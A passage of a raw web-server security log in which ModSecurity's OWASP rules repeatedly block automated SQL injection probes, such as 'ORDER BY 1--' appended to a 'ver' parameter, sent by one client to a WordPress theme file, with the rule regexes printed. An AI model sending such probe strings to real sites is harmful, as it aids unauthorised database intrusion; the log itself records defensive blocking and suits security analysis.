[tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1qZdLCjsWrLhZKAOZdwAAAFI"] [Sat Aug 31 01:18:17.514767 2024] [:error] [pid 8675:tid 140590427653888] [client 193.29.13.20:37790] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:ver: 1.8.5.47) ORDER BY 1-- hfUh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1qZdLCjsWrLhZKAOZeAAAAEc"] [Sat Aug 31 01:18:17.918044 2024] [:error] [pid 8675:tid 140590556882688] [client 193.29.13.20:37792] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1qZdLCjsWrLhZKAOZeQAAAEA"] [Sat Aug 31 01:18:18.603136 2024] [:error] [pid 8676:tid 140590310156032] [client 193.29.13.20:37794] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1qmm8LEssXUq6wJ2LLwAAAJU"] [Sat Aug 31 01:18:19.065975 2024] [:error] [pid 8676:tid 140590548489984] [client 193.29.13.20:37796] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1q2m8LEssXUq6wJ2LMAAAAIE"] [Sat Aug 31 01:18:19.672293 2024] [:error] [pid 8676:tid 140590343726848] [client 193.29.13.20:37798] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1q2m8LEssXUq6wJ2LMQAAAJE"] [Sat Aug 31 01:18:20.174969 2024] [:error] [pid 9366:tid 140590410868480] [client 193.29.13.20:37800] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1rA1VuGGNTxm_kiOEwwAAAMk"] [Sat Aug 31 01:18:20.775407 2024] [:error] [pid 9366:tid 140590419261184] [client 193.29.13.20:37802] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1rA1VuGGNTxm_kiOExAAAAMg"] [Sat Aug 31 01:18:21.365872 2024] [:error] [pid 9366:tid 140590385690368] [client 193.29.13.20:37804] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1rQ1VuGGNTxm_kiOExQAAAMw"] [Sat Aug 31 01:18:21.920861 2024] [:error] [pid 9366:tid 140590556882688] [client 193.29.13.20:37806] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1rQ1VuGGNTxm_kiOExgAAAMA"] [Sat Aug 31 01:18:22.347937 2024] [:error] [pid 8675:tid 140590368904960] [client 193.29.13.20:37808] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1rpdLCjsWrLhZKAOZegAAAE4"] [Sat Aug 31 01:18:22.919184 2024] [:error] [pid 9366:tid 140590318548736] [client 193.29.13.20:37812] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1rg1VuGGNTxm_kiOExwAAANQ"] [Sat Aug 31 01:18:23.338920 2024] [:error] [pid 9366:tid 140590436046592] [client 193.29.13.20:37814] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:ver: 1.8.5.47 ORDER BY 1-- ABjJ"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1rw1VuGGNTxm_kiOEyAAAAMY"] [Sat Aug 31 01:18:23.932776 2024] [:error] [pid 9366:tid 140590394083072] [client 193.29.13.20:37816] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1rw1VuGGNTxm_kiOEyQAAAMs"] [Sat Aug 31 01:18:24.449146 2024] [:error] [pid 9366:tid 140590352119552] [client 193.29.13.20:37818] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1sA1VuGGNTxm_kiOEygAAANA"] [Sat Aug 31 01:18:25.093993 2024] [:error] [pid 9366:tid 140590548489984] [client 193.29.13.20:37820] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1sQ1VuGGNTxm_kiOEywAAAME"] [Sat Aug 31 01:18:25.621663 2024] [:error] [pid 9366:tid 140590301763328] [client 193.29.13.20:37822] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1sQ1VuGGNTxm_kiOEzAAAANY"] [Sat Aug 31 01:18:26.032593 2024] [:error] [pid 8676:tid 140590335334144] [client 193.29.13.20:37824] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1smm8LEssXUq6wJ2LMgAAAJI"] [Sat Aug 31 01:18:26.513049 2024] [:error] [pid 8676:tid 140590444439296] [client 193.29.13.20:37826] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1smm8LEssXUq6wJ2LMwAAAIU"] [Sat Aug 31 01:18:26.976998 2024] [:error] [pid 8676:tid 140590452832000] [client 193.29.13.20:37828] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1smm8LEssXUq6wJ2LNAAAAIQ"] [Sat Aug 31 01:18:27.381658 2024] [:error] [pid 9366:tid 140590444439296] [client 193.29.13.20:37830] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1sw1VuGGNTxm_kiOEzQAAAMU"] [Sat Aug 31 01:18:27.899245 2024] [:error] [pid 8676:tid 140590284977920] [client 193.29.13.20:37832] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1s2m8LEssXUq6wJ2LNQAAAJg"] [Sat Aug 31 01:18:28.463758 2024] [:error] [pid 8676:tid 140590402475776] [client 193.29.13.20:37834] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1tGm8LEssXUq6wJ2LNgAAAIo"] [Sat Aug 31 01:18:28.852950 2024] [:error] [pid 8676:tid 140590427653888] [client 193.29.13.20:37836] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\b(?i:having)\\\\b\\\\s+(\\\\d{1,10}|'[^=]{1,10}')\\\\s*?[=<>]|(?i:\\\\bexecute(\\\\s{1,5}[\\\\w\\\\.$]{1,5}\\\\s{0,3})?\\\\()|\\\\bhaving\\\\b ?(?:\\\\d{1,10}|[\\\\'\\"][^=]{1,10}[\\\\'\\"]) ?[=<>]+|(?i:\\\\bcreate\\\\s+?table.{0,20}?\\\\()|(?i:\\\\blike\\\\W*?char\\\\W*?\\\\()|(?i:(?:(select(.* ..." at ARGS:ver. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "130"] [id "959070"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: ORDER BY found within ARGS:ver: 1.8.5.47') ORDER BY 1-- UHUt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1tGm8LEssXUq6wJ2LNwAAAIc"] [Sat Aug 31 01:18:29.428303 2024] [:error] [pid 9366:tid 140590402475776] [client 193.29.13.20:37838] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1tQ1VuGGNTxm_kiOEzgAAAMo"] [Sat Aug 31 01:18:29.924759 2024] [:error] [pid 9366:tid 140590310156032] [client 193.29.13.20:37840] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1tQ1VuGGNTxm_kiOEzwAAANU"] [Sat Aug 31 01:18:30.485399 2024] [:error] [pid 8676:tid 140590394083072] [client 193.29.13.20:37842] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1tmm8LEssXUq6wJ2LOAAAAIs"] [Sat Aug 31 01:18:30.894256 2024] [:error] [pid 8676:tid 140590556882688] [client 193.29.13.20:37844] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1tmm8LEssXUq6wJ2LOQAAAIA"] [Sat Aug 31 01:18:31.511628 2024] [:error] [pid 9366:tid 140590343726848] [client 193.29.13.20:37846] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1tw1VuGGNTxm_kiOE0AAAANE"] [Sat Aug 31 01:18:32.053978 2024] [:error] [pid 9366:tid 140590531704576] [client 193.29.13.20:37848] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/themes/zerif-lite/js/zerif.js"] [unique_id "ZtK1uA1VuGGNTxm_kiOE0QAAAMM"] [Sat Aug 31 01:18:32.599640 2024] [:error] [pid 8675:tid 140590540097280] [client 193.29.13.20:37850] [client 193.29.13.20] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 3 at TX:sqli_select_statement_count. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "108"] [id "981317"] [rev "2"] [msg "SQL SELECT Statement Anomaly Detection Alert"] [data "Matched Data: Content-Type found within TX:sqli_select_statement_count: 3"] [ver "OWASP_CRS/2.2.9"] [maturity "8"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri 